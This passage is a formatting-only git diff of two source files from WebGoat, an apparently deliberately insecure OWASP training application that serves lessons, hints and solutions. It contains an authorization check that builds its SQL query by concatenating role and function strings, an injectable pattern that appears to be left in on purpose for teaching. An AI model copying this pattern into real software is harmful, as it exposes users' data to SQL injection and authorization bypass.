 import javax.servlet.http.HttpServletResponse;
-
 import org.owasp.webgoat.lessons.AbstractLesson;
 import org.owasp.webgoat.session.Course;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
@@ -98,7 +96,8 @@ public class LessonSource extends HammerHead
 				AbstractLesson lesson = course.getLesson(session, scr, AbstractLesson.USER_ROLE);
 				lesson.getLessonTracker(session).setViewedSolution(true);
 
-			} else if (showSource) 
+			}
+			else if (showSource)
 			{
 
 				// Get the Java source of the lesson. FIXME: Not needed
@@ -109,19 +108,16 @@ public class LessonSource extends HammerHead
 				AbstractLesson lesson = course.getLesson(session, scr, AbstractLesson.USER_ROLE);
 				lesson.getLessonTracker(session).setViewedSource(true);
 			}
-		}
-		catch (Throwable t)
+		} catch (Throwable t)
 		{
 			t.printStackTrace();
 			log("ERROR: " + t);
-		}
-		finally
+		} finally
 		{
 			try
 			{
 				this.writeSource(source, response);
-			}
-			catch (Throwable thr)
+			} catch (Throwable thr)
 			{
 				thr.printStackTrace();
 				log(request, "Could not write error screen: " + thr.getMessage());
@@ -155,12 +151,10 @@ public class LessonSource extends HammerHead
 				source = lesson.getSource(s);
 			}
 		}
-		if (source == null)
-		{
-			return "Source code is not available. Contact " + s.getWebgoatContext().getFeedbackAddress();
-		}
+		if (source == null) { return "Source code is not available. Contact "
+				+ s.getWebgoatContext().getFeedbackAddress(); }
 		return (source.replaceAll("(?s)" + START_SOURCE_SKIP + ".*" + END_SOURCE_SKIP,
-								  "Code Section Deliberately Omitted"));
+									"Code Section Deliberately Omitted"));
 	}
 
 	protected String getSolution(WebSession s)
@@ -180,10 +174,8 @@ public class LessonSource extends HammerHead
 				source = lesson.getSolution(s);
 			}
 		}
-		if (source == null)
-		{
-			return "Solution  is not available. Contact " + s.getWebgoatContext().getFeedbackAddress();
-		}
+		if (source == null) { return "Solution  is not available. Contact "
+				+ s.getWebgoatContext().getFeedbackAddress(); }
 		return (source);
 	}
 
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/AbstractLesson.java b/main/project/JavaSource/org/owasp/webgoat/lessons/AbstractLesson.java
index f29f60903..f54f799e6 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/AbstractLesson.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/AbstractLesson.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.io.BufferedReader;
@@ -27,32 +28,31 @@ import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.session.WebgoatContext;
 import org.owasp.webgoat.session.WebgoatProperties;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
@@ -62,829 +62,761 @@ import org.owasp.webgoat.session.WebgoatProperties;
 public abstract class AbstractLesson extends Screen implements Comparable
 {
 
-    /**
-     * Description of the Field
-     */
-    public final static String ADMIN_ROLE = "admin";
+	/**
+	 * Description of the Field
+	 */
+	public final static String ADMIN_ROLE = "admin";
 
-    public final static String CHALLENGE_ROLE = "challenge";
+	public final static String CHALLENGE_ROLE = "challenge";
 
-    /**
-     * Description of the Field
-     */
-    public final static String HACKED_ADMIN_ROLE = "hacked_admin";
+	/**
+	 * Description of the Field
+	 */
+	public final static String HACKED_ADMIN_ROLE = "hacked_admin";
 
-    /**
-     * Description of the Field
-     */
-    public final static String USER_ROLE = "user";
+	/**
+	 * Description of the Field
+	 */
+	public final static String USER_ROLE = "user";
 
-    private static int count = 1;
+	private static int count = 1;
 
-    private Integer id = null;
+	private Integer id = null;
 
-    final static IMG nextGrey = new IMG("images/right16.gif").setAlt("Next")
-	    .setBorder(0).setHspace(0).setVspace(0);
+	final static IMG nextGrey = new IMG("images/right16.gif").setAlt("Next").setBorder(0).setHspace(0).setVspace(0);
 
-    final static IMG previousGrey = new IMG("images/left14.gif").setAlt(
-	    "Previous").setBorder(0).setHspace(0).setVspace(0);
+	final static IMG previousGrey = new IMG("images/left14.gif").setAlt("Previous").setBorder(0).setHspace(0)
+			.setVspace(0);
 
-    private Integer ranking;
+	private Integer ranking;
 
-    private Category category;
+	private Category category;
 
-    private boolean hidden;
+	private boolean hidden;
 
-    private String sourceFileName;
+	private String sourceFileName;
 
-    private String lessonPlanFileName;
+	private String lessonPlanFileName;
 
-    private String lessonSolutionFileName;
+	private String lessonSolutionFileName;
 
-    private WebgoatContext webgoatContext;
-    
-    /**
-     * Constructor for the Lesson object
-     */
-    public AbstractLesson()
-    {
-    	id = new Integer(++count);
-    }
+	private WebgoatContext webgoatContext;
 
-
-    public String getName()
-    {
-	String className = getClass().getName();
-	return className.substring(className.lastIndexOf('.') + 1);
-    }
-
-
-    public void setRanking(Integer ranking)
-    {
-	this.ranking = ranking;
-    }
-
-
-    public void setHidden(boolean hidden)
-    {
-	this.hidden = hidden;
-    }
-
-    public void update(WebgoatProperties properties)
-    {
-	String className = getClass().getName();
-	className = className.substring(className.lastIndexOf(".") + 1);
-	setRanking(new Integer(properties.getIntProperty("lesson." + className
-		+ ".ranking", getDefaultRanking().intValue())));
-	String categoryRankingKey = "category."
-		+ getDefaultCategory().getName() + ".ranking";
-	// System.out.println("Category ranking key: " + categoryRankingKey);
-	Category tempCategory = Category.getCategory(getDefaultCategory()
-		.getName());
-	tempCategory.setRanking(new Integer(properties.getIntProperty(
-		categoryRankingKey, getDefaultCategory().getRanking()
-			.intValue())));
-	category = tempCategory;
-	setHidden(properties.getBooleanProperty("lesson." + className
-		+ ".hidden", getDefaultHidden()));
-	// System.out.println(className + " in " + tempCategory.getName() + "
-	// (Category Ranking: " + tempCategory.getRanking() + " Lesson ranking:
-	// " + getRanking() + ", hidden:" + hidden +")");
-    }
-
-
-    public boolean isCompleted(WebSession s)
-    {
-	return getLessonTracker(s, this).getCompleted();
-    }
-
-
-    /**
-     * Gets the credits attribute of the AbstractLesson object
-     * 
-     * @return The credits value
-     */
-    public abstract Element getCredits();
-
-    /**
-     * Description of the Method
-     * 
-     * @param obj
-     *        Description of the Parameter
-     * @return Description of the Return Value
-     */
-    public int compareTo(Object obj)
-    {
-	return this.getRanking().compareTo(((AbstractLesson) obj).getRanking());
-    }
-
-
-    /**
-     * Description of the Method
-     * 
-     * @param obj
-     *        Description of the Parameter
-     * @return Description of the Return Value
-     */
-    public boolean equals(Object obj)
-    {
-	return this.getScreenId() == ((AbstractLesson) obj).getScreenId();
-    }
-
-
-    /**
-     * Gets the category attribute of the Lesson object
-     * 
-     * @return The category value
-     */
-    public Category getCategory()
-    {
-	return category;
-    }
-
-
-    protected abstract Integer getDefaultRanking();
-
-
-    protected abstract Category getDefaultCategory();
-
-
-    protected abstract boolean getDefaultHidden();
-
-    /**
-     * Gets the fileMethod attribute of the Lesson class
-     * 
-     * @param reader
-     *        Description of the Parameter
-     * @param methodName
-     *        Description of the Parameter
-     * @param numbers
-     *        Description of the Parameter
-     * @return The fileMethod value
-     */
-    public static String getFileMethod(BufferedReader reader,
-	    String methodName, boolean numbers)
-    {
-	int count = 0;
-	StringBuffer sb = new StringBuffer();
-	boolean echo = false;
-	boolean startCount = false;
-	int parenCount = 0;
-
-	try
+	/**
+	 * Constructor for the Lesson object
+	 */
+	public AbstractLesson()
 	{
-	    String line;
+		id = new Integer(++count);
+	}
 
-	    while ((line = reader.readLine()) != null)
-	    {
-		if ((line.indexOf(methodName) != -1)
-			&& ((line.indexOf("public") != -1)
-				|| (line.indexOf("protected") != -1) || (line
-				.indexOf("private") != -1)))
+	public String getName()
+	{
+		String className = getClass().getName();
+		return className.substring(className.lastIndexOf('.') + 1);
+	}
+
+	public void setRanking(Integer ranking)
+	{
+		this.ranking = ranking;
+	}
+
+	public void setHidden(boolean hidden)
+	{
+		this.hidden = hidden;
+	}
+
+	public void update(WebgoatProperties properties)
+	{
+		String className = getClass().getName();
+		className = className.substring(className.lastIndexOf(".") + 1);
+		setRanking(new Integer(properties.getIntProperty("lesson." + className + ".ranking", getDefaultRanking()
+				.intValue())));
+		String categoryRankingKey = "category." + getDefaultCategory().getName() + ".ranking";
+		// System.out.println("Category ranking key: " + categoryRankingKey);
+		Category tempCategory = Category.getCategory(getDefaultCategory().getName());
+		tempCategory.setRanking(new Integer(properties.getIntProperty(categoryRankingKey, getDefaultCategory()
+				.getRanking().intValue())));
+		category = tempCategory;
+		setHidden(properties.getBooleanProperty("lesson." + className + ".hidden", getDefaultHidden()));
+		// System.out.println(className + " in " + tempCategory.getName() + "
+		// (Category Ranking: " + tempCategory.getRanking() + " Lesson ranking:
+		// " + getRanking() + ", hidden:" + hidden +")");
+	}
+
+	public boolean isCompleted(WebSession s)
+	{
+		return getLessonTracker(s, this).getCompleted();
+	}
+
+	/**
+	 * Gets the credits attribute of the AbstractLesson object
+	 * 
+	 * @return The credits value
+	 */
+	public abstract Element getCredits();
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param obj
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public int compareTo(Object obj)
+	{
+		return this.getRanking().compareTo(((AbstractLesson) obj).getRanking());
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param obj
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public boolean equals(Object obj)
+	{
+		return this.getScreenId() == ((AbstractLesson) obj).getScreenId();
+	}
+
+	/**
+	 * Gets the category attribute of the Lesson object
+	 * 
+	 * @return The category value
+	 */
+	public Category getCategory()
+	{
+		return category;
+	}
+
+	protected abstract Integer getDefaultRanking();
+
+	protected abstract Category getDefaultCategory();
+
+	protected abstract boolean getDefaultHidden();
+
+	/**
+	 * Gets the fileMethod attribute of the Lesson class
+	 * 
+	 * @param reader
+	 *            Description of the Parameter
+	 * @param methodName
+	 *            Description of the Parameter
+	 * @param numbers
+	 *            Description of the Parameter
+	 * @return The fileMethod value
+	 */
+	public static String getFileMethod(BufferedReader reader, String methodName, boolean numbers)
+	{
+		int count = 0;
+		StringBuffer sb = new StringBuffer();
+		boolean echo = false;
+		boolean startCount = false;
+		int parenCount = 0;
+
+		try
 		{
-		    echo = true;
-		    startCount = true;
+			String line;
+
+			while ((line = reader.readLine()) != null)
+			{
+				if ((line.indexOf(methodName) != -1)
+						&& ((line.indexOf("public") != -1) || (line.indexOf("protected") != -1) || (line
+								.indexOf("private") != -1)))
+				{
+					echo = true;
+					startCount = true;
+				}
+
+				if (echo && startCount)
+				{
+					if (numbers)
+					{
+						sb.append(pad(++count) + "    ");
+					}
+
+					sb.append(line + "\n");
+				}
+
+				if (echo && (line.indexOf("{") != -1))
+				{
+					parenCount++;
+				}
+
+				if (echo && (line.indexOf("}") != -1))
+				{
+					parenCount--;
+
+					if (parenCount == 0)
+					{
+						startCount = false;
+						echo = false;
+					}
+				}
+			}
+
+			reader.close();
+		} catch (Exception e)
+		{
+			System.out.println(e);
+			e.printStackTrace();
 		}
 
-		if (echo && startCount)
-		{
-		    if (numbers)
-		    {
-			sb.append(pad(++count) + "    ");
-		    }
+		return (sb.toString());
+	}
 
-		    sb.append(line + "\n");
+	/**
+	 * Reads text from a file into an ElementContainer. Each line in the file is represented in the
+	 * ElementContainer by a StringElement. Each StringElement is appended with a new-line
+	 * character.
+	 * 
+	 * @param reader
+	 *            Description of the Parameter
+	 * @param numbers
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public static String readFromFile(BufferedReader reader, boolean numbers)
+	{
+		return (getFileText(reader, numbers));
+	}
+
+	/**
+	 * Gets the fileText attribute of the Screen class
+	 * 
+	 * @param reader
+	 *            Description of the Parameter
+	 * @param numbers
+	 *            Description of the Parameter
+	 * @return The fileText value
+	 */
+	public static String getFileText(BufferedReader reader, boolean numbers)
+	{
+		int count = 0;
+		StringBuffer sb = new StringBuffer();
+
+		try
+		{
+			String line;
+
+			while ((line = reader.readLine()) != null)
+			{
+				if (numbers)
+				{
+					sb.append(pad(++count) + "  ");
+				}
+				sb.append(line + System.getProperty("line.separator"));
+			}
+
+			reader.close();
+		} catch (Exception e)
+		{
+			System.out.println(e);
+			e.printStackTrace();
 		}
 
-		if (echo && (line.indexOf("{") != -1))
+		return (sb.toString());
+	}
+
+	/**
+	 * Will this screen be included in an enterprise edition.
+	 * 
+	 * @return The ranking value
+	 */
+	public boolean isEnterprise()
+	{
+		return false;
+	}
+
+	/**
+	 * Gets the hintCount attribute of the Lesson object
+	 * 
+	 * @param s
+	 *            The user's WebSession
+	 * 
+	 * @return The hintCount value
+	 */
+	public int getHintCount(WebSession s)
+	{
+		return getHints(s).size();
+	}
+
+	protected abstract List<String> getHints(WebSession s);
+
+	/**
+	 * Fill in a minor hint that will help people who basically get it, but are stuck on somthing
+	 * silly.
+	 * 
+	 * @param s
+	 *            The users WebSession
+	 * 
+	 * @return The hint1 value
+	 */
+	public String getHint(WebSession s, int hintNumber)
+	{
+		return getHints(s).get(hintNumber);
+	}
+
+	/**
+	 * Gets the instructions attribute of the AbstractLesson object
+	 * 
+	 * @return The instructions value
+	 */
+	public abstract String getInstructions(WebSession s);
+
+	/**
+	 * Gets the lessonPlan attribute of the Lesson object
+	 * 
+	 * @return The lessonPlan value
+	 */
+	protected String getLessonName()
+	{
+		int index = this.getClass().getName().indexOf("lessons.");
+		return this.getClass().getName().substring(index + "lessons.".length());
+	}
+
+	/**
+	 * Gets the title attribute of the HelloScreen object
+	 * 
+	 * @return The title value
+	 */
+	public abstract String getTitle();
+
+	/**
+	 * Gets the content of lessonPlanURL
+	 * 
+	 * @param s
+	 *            The user's WebSession
+	 * 
+	 * @return The HTML content of the current lesson plan
+	 */
+	public String getLessonPlan(WebSession s)
+	{
+		String src = null;
+
+		try
 		{
-		    parenCount++;
+			// System.out.println("Loading lesson plan file: " +
+			// getLessonPlanFileName());
+			src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonPlanFileName()))), false);
+
+		} catch (Exception e)
+		{
+			// s.setMessage( "Could not find lesson plan for " +
+			// getLessonName());
+			src = ("Could not find lesson plan for: " + getLessonName());
+
+		}
+		return src;
+	}
+
+	/**
+	 * Gets the ranking attribute of the Lesson object
+	 * 
+	 * @return The ranking value
+	 */
+	public Integer getRanking()
+	{
+		if (ranking != null)
+		{
+			return ranking;
+		}
+		else
+		{
+			return getDefaultRanking();
+		}
+	}
+
+	/**
+	 * Gets the hidden value of the Lesson Object
+	 * 
+	 * @return The hidden value
+	 */
+	public boolean getHidden()
+	{
+		return this.hidden;
+	}
+
+	/**
+	 * Gets the role attribute of the AbstractLesson object
+	 * 
+	 * @return The role value
+	 */
+	public String getRole()
+	{
+		// FIXME: Each lesson should have a role assigned to it. Each
+		// user/student
+		// should also have a role(s) assigned. The user would only be allowed
+		// to see lessons that correspond to their role. Eventually these roles
+		// will be stored in the internal database. The user will be able to
+		// hack
+		// into the database and change their role. This will allow the user to
+		// see the admin screens, once they figure out how to turn the admin
+		// switch on.
+		return USER_ROLE;
+	}
+
+	/**
+	 * Gets the uniqueID attribute of the AbstractLesson object
+	 * 
+	 * @return The uniqueID value
+	 */
+	public int getScreenId()
+	{
+		return id.intValue();
+	}
+
+	public String getHtml_DELETE_ME(WebSession s)
+	{
+		String html = null;
+
+		// FIXME: This doesn't work for the labs since they do not implement
+		// createContent().
+		String rawHtml = createContent(s).toString();
+		// System.out.println("Getting raw html content: " +
+		// rawHtml.substring(0, Math.min(rawHtml.length(), 100)));
+		html = convertMetachars(AbstractLesson.readFromFile(new BufferedReader(new StringReader(rawHtml)), true));
+		// System.out.println("Getting encoded html content: " +
+		// html.substring(0, Math.min(html.length(), 100)));
+
+		return html;
+	}
+
+	public String getSource(WebSession s)
+	{
+		String source = null;
+		String src = null;
+
+		try
+		{
+			// System.out.println("Loading source file: " +
+			// getSourceFileName());
+			src = convertMetacharsJavaCode(readFromFile(new BufferedReader(new FileReader(s
+					.getWebResource(getSourceFileName()))), true));
+
+			// TODO: For styled line numbers and better memory efficiency,
+			// use a custom FilterReader
+			// that performs the convertMetacharsJavaCode() transform plus
+			// optionally adds a styled
+			// line number. Wouldn't color syntax be great too?
+		} catch (IOException e)
+		{
+			s.setMessage("Could not find source file");
+			src = ("Could not find source file");
 		}
 
-		if (echo && (line.indexOf("}") != -1))
+		Html html = new Html();
+
+		Head head = new Head();
+		head.addElement(new Title(getSourceFileName()));
+
+		Body body = new Body();
+		body.addElement(new StringElement(src));
+
+		html.addElement(head);
+		html.addElement(body);
+
+		source = html.toString();
+
+		return source;
+	}
+
+	public String getSolution(WebSession s)
+	{
+		String src = null;
+
+		try
 		{
-		    parenCount--;
-
-		    if (parenCount == 0)
-		    {
-			startCount = false;
-			echo = false;
-		    }
-		}
-	    }
-
-	    reader.close();
-	}
-	catch (Exception e)
-	{
-	    System.out.println(e);
-	    e.printStackTrace();
-	}
-
-	return (sb.toString());
-    }
-
-
-    /**
-     * Reads text from a file into an ElementContainer. Each line in the
-     * file is represented in the ElementContainer by a StringElement. Each
-     * StringElement is appended with a new-line character.
-     * 
-     * @param reader
-     *        Description of the Parameter
-     * @param numbers
-     *        Description of the Parameter
-     * @return Description of the Return Value
-     */
-    public static String readFromFile(BufferedReader reader, boolean numbers)
-    {
-	return (getFileText(reader, numbers));
-    }
-
-
-    /**
-     * Gets the fileText attribute of the Screen class
-     * 
-     * @param reader
-     *        Description of the Parameter
-     * @param numbers
-     *        Description of the Parameter
-     * @return The fileText value
-     */
-    public static String getFileText(BufferedReader reader, boolean numbers)
-    {
-	int count = 0;
-	StringBuffer sb = new StringBuffer();
-
-	try
-	{
-	    String line;
-
-	    while ((line = reader.readLine()) != null)
-	    {
-		if (numbers)
+			src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName()))), false);
+		} catch (IOException e)
 		{
-		    sb.append(pad(++count) + "  ");
+			s.setMessage("Could not find the solution file");
+			src = ("Could not find the solution file");
 		}
-		sb.append(line + System.getProperty("line.separator"));
-	    }
 
-	    reader.close();
+		Html html = new Html();
+
+		Head head = new Head();
+		head.addElement(new Title(getLessonSolutionFileName()));
+
+		Body body = new Body();
+		body.addElement(new StringElement(src));
+
+		html.addElement(head);
+		html.addElement(body);
+
+		return src;
 	}
-	catch (Exception e)
+
+	/**
+	 * Get the link that can be used to request this screen.
+	 * 
+	 * @return
+	 */
+	public String getLink()
 	{
-	    System.out.println(e);
-	    e.printStackTrace();
+		StringBuffer link = new StringBuffer();
+
+		link.append("attack?");
+		link.append(WebSession.SCREEN);
+		link.append("=");
+		link.append(getScreenId());
+		link.append("&");
+		link.append(WebSession.MENU);
+		link.append("=");
+		link.append(getCategory().getRanking());
+		return link.toString();
 	}
 
-	return (sb.toString());
-    }
-
-
-    /**
-     * Will this screen be included in an enterprise edition.
-     * 
-     * @return The ranking value
-     */
-    public boolean isEnterprise()
-    {
-	return false;
-    }
-
-
-    /**
-     * Gets the hintCount attribute of the Lesson object
-     * @param s The user's WebSession
-     * 
-     * @return The hintCount value
-     */
-    public int getHintCount(WebSession s)
-    {
-	return getHints(s).size();
-    }
-
-
-    protected abstract List<String> getHints(WebSession s);
-
-
-    /**
-     * Fill in a minor hint that will help people who basically get it, but
-     * are stuck on somthing silly.
-     * @param s The users WebSession
-     * 
-     * @return The hint1 value
-     */
-    public String getHint(WebSession s, int hintNumber)
-    {
-	return getHints(s).get(hintNumber);
-    }
-
-
-    /**
-     * Gets the instructions attribute of the AbstractLesson object
-     * 
-     * @return The instructions value
-     */
-    public abstract String getInstructions(WebSession s);
-
-
-    /**
-     * Gets the lessonPlan attribute of the Lesson object
-     * 
-     * @return The lessonPlan value
-     */
-    protected String getLessonName()
-    {
-	int index = this.getClass().getName().indexOf("lessons.");
-	return this.getClass().getName().substring(index + "lessons.".length());
-    }
-
-
-    /**
-     * Gets the title attribute of the HelloScreen object
-     * 
-     * @return The title value
-     */
-    public abstract String getTitle();
-
-
-    /**
-     * Gets the content of lessonPlanURL
-     * 
-     * @param s
-     *        The user's WebSession
-     * 
-     * @return The HTML content of the current lesson plan
-     */
-    public String getLessonPlan(WebSession s)
-    {
-	String src = null;
-
-	try
+	/**
+	 * Get the link to the jsp page used to render this screen.
+	 * 
+	 * @return
+	 */
+	public String getPage(WebSession s)
 	{
-	    // System.out.println("Loading lesson plan file: " +
-	    // getLessonPlanFileName());
-	    src = readFromFile(new BufferedReader(new FileReader(s
-		    .getWebResource(getLessonPlanFileName()))), false);
-
+		return null;
 	}
-	catch (Exception e)
+
+	/**
+	 * Get the link to the jsp template page used to render this screen.
+	 * 
+	 * @return
+	 */
+	public String getTemplatePage(WebSession s)
 	{
-	    // s.setMessage( "Could not find lesson plan for " +
-	    // getLessonName());
-	    src = ("Could not find lesson plan for: " + getLessonName());
-
+		return null;
 	}
-	return src;
-    }
 
+	public abstract String getCurrentAction(WebSession s);
 
-    /**
-     * Gets the ranking attribute of the Lesson object
-     * 
-     * @return The ranking value
-     */
-    public Integer getRanking()
-    {
-	if (ranking != null)
+	public abstract void setCurrentAction(WebSession s, String lessonScreen);
+
+	/**
+	 * Override this method to implement accesss control in a lesson.
+	 * 
+	 * @param s
+	 * @param functionId
+	 * @return
+	 */
+	public boolean isAuthorized(WebSession s, int employeeId, String functionId)
 	{
-	    return ranking;
+		return false;
 	}
-	else
+
+	/**
+	 * Override this method to implement accesss control in a lesson.
+	 * 
+	 * @param s
+	 * @param functionId
+	 * @return
+	 */
+	public boolean isAuthorized(WebSession s, String role, String functionId)
 	{
-	    return getDefaultRanking();
+		boolean authorized = false;
+		try
+		{
+			String query = "SELECT * FROM auth WHERE role = '" + role + "' and functionid = '" + functionId + "'";
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				authorized = answer_results.first();
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error authorizing");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error authorizing");
+			e.printStackTrace();
+		}
+		return authorized;
 	}
-    }
 
-
-    /**
-     * Gets the hidden value of the Lesson Object
-     * 
-     * @return The hidden value
-     */
-    public boolean getHidden()
-    {
-	return this.hidden;
-    }
-
-
-    /**
-     * Gets the role attribute of the AbstractLesson object
-     * 
-     * @return The role value
-     */
-    public String getRole()
-    {
-	// FIXME: Each lesson should have a role assigned to it. Each
-	// user/student
-	// should also have a role(s) assigned. The user would only be allowed
-	// to see lessons that correspond to their role. Eventually these roles
-	// will be stored in the internal database. The user will be able to
-	// hack
-	// into the database and change their role. This will allow the user to
-	// see the admin screens, once they figure out how to turn the admin
-	// switch on.
-	return USER_ROLE;
-    }
-
-
-    /**
-     * Gets the uniqueID attribute of the AbstractLesson object
-     * 
-     * @return The uniqueID value
-     */
-    public int getScreenId()
-    {
-	return id.intValue();
-    }
-
-
-    public String getHtml_DELETE_ME(WebSession s)
-    {
-	String html = null;
-
-	// FIXME: This doesn't work for the labs since they do not implement
-	// createContent().
-	String rawHtml = createContent(s).toString();
-	// System.out.println("Getting raw html content: " +
-	// rawHtml.substring(0, Math.min(rawHtml.length(), 100)));
-	html = convertMetachars(AbstractLesson.readFromFile(new BufferedReader(
-		new StringReader(rawHtml)), true));
-	// System.out.println("Getting encoded html content: " +
-	// html.substring(0, Math.min(html.length(), 100)));
-
-	return html;
-    }
-
-
-    public String getSource(WebSession s)
-    {
-	String source = null;
-	String src = null;
-
-	try
+	public int getUserId(WebSession s) throws ParameterNotFoundException
 	{
-	    // System.out.println("Loading source file: " +
-	    // getSourceFileName());
-	    src = convertMetacharsJavaCode(readFromFile(new BufferedReader(
-		    new FileReader(s.getWebResource(getSourceFileName()))),
-		    true));
-
-	    // TODO: For styled line numbers and better memory efficiency,
-	    // use a custom FilterReader
-	    // that performs the convertMetacharsJavaCode() transform plus
-	    // optionally adds a styled
-	    // line number. Wouldn't color syntax be great too?
+		return -1;
 	}
-	catch (IOException e)
+
+	public String getUserName(WebSession s) throws ParameterNotFoundException
 	{
-	    s.setMessage("Could not find source file");
-	    src = ("Could not find source file");
+		return null;
 	}
 
-	Html html = new Html();
-
-	Head head = new Head();
-	head.addElement(new Title(getSourceFileName()));
-
-	Body body = new Body();
-	body.addElement(new StringElement(src));
-
-	html.addElement(head);
-	html.addElement(body);
-
-	source = html.toString();
-
-	return source;
-    }
-
-
-    public String getSolution(WebSession s)
-    {
-	String src = null;
-
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param windowName
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public static String makeWindowScript(String windowName)
 	{
-	    src = readFromFile(new BufferedReader(
-		    new FileReader(s.getWebResource(getLessonSolutionFileName()))),
-		    false);
+		// FIXME: make this string static
+		StringBuffer script = new StringBuffer();
+		script.append("<script language=\"JavaScript\">\n");
+		script.append("	<!--\n");
+		script.append("	  function makeWindow(url) {\n");
+		script.append("\n");
+		script.append("	      agent = navigator.userAgent;\n");
+		script.append("\n");
+		script.append("	      params  = \"\";\n");
+		script.append("	      params += \"toolbar=0,\";\n");
+		script.append("	      params += \"location=0,\";\n");
+		script.append("	      params += \"directories=0,\";\n");
+		script.append("	      params += \"status=0,\";\n");
+		script.append("	      params += \"menubar=0,\";\n");
+		script.append("	      params += \"scrollbars=1,\";\n");
+		script.append("	      params += \"resizable=1,\";\n");
+		script.append("	      params += \"width=500,\";\n");
+		script.append("	      params += \"height=350\";\n");
+		script.append("\n");
+		script.append("		  // close the window to vary the window size\n");
+		script.append("	   	  if (typeof(win) == \"object\" && !win.closed){\n");
+		script.append("            win.close();\n");
+		script.append("	      }\n");
+		script.append("\n");
+		script.append("	      win = window.open(url, '" + windowName + "' , params);\n");
+		script.append("\n");
+		script.append(" 		  // bring the window to the front\n");
+		script.append("		  win.focus();\n");
+		script.append("	  }\n");
+		script.append("	//-->\n");
+		script.append("	</script>\n");
+
+		return script.toString();
 	}
-	catch (IOException e)
+
+	/**
+	 * Simply reads a url into an Element for display. CAUTION: you might want to tinker with any
+	 * non-https links (href)
+	 * 
+	 * @param url
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public static Element readFromURL(String url)
 	{
-	    s.setMessage("Could not find the solution file");
-	    src = ("Could not find the solution file");
+		ElementContainer ec = new ElementContainer();
+
+		try
+		{
+			URL u = new URL(url);
+			HttpURLConnection huc = (HttpURLConnection) u.openConnection();
+			BufferedReader reader = new BufferedReader(new InputStreamReader(huc.getInputStream()));
+			String line;
+
+			while ((line = reader.readLine()) != null)
+			{
+				ec.addElement(new StringElement(line));
+			}
+
+			reader.close();
+		} catch (Exception e)
+		{
+			System.out.println(e);
+			e.printStackTrace();
+		}
+
+		return (ec);
 	}
 
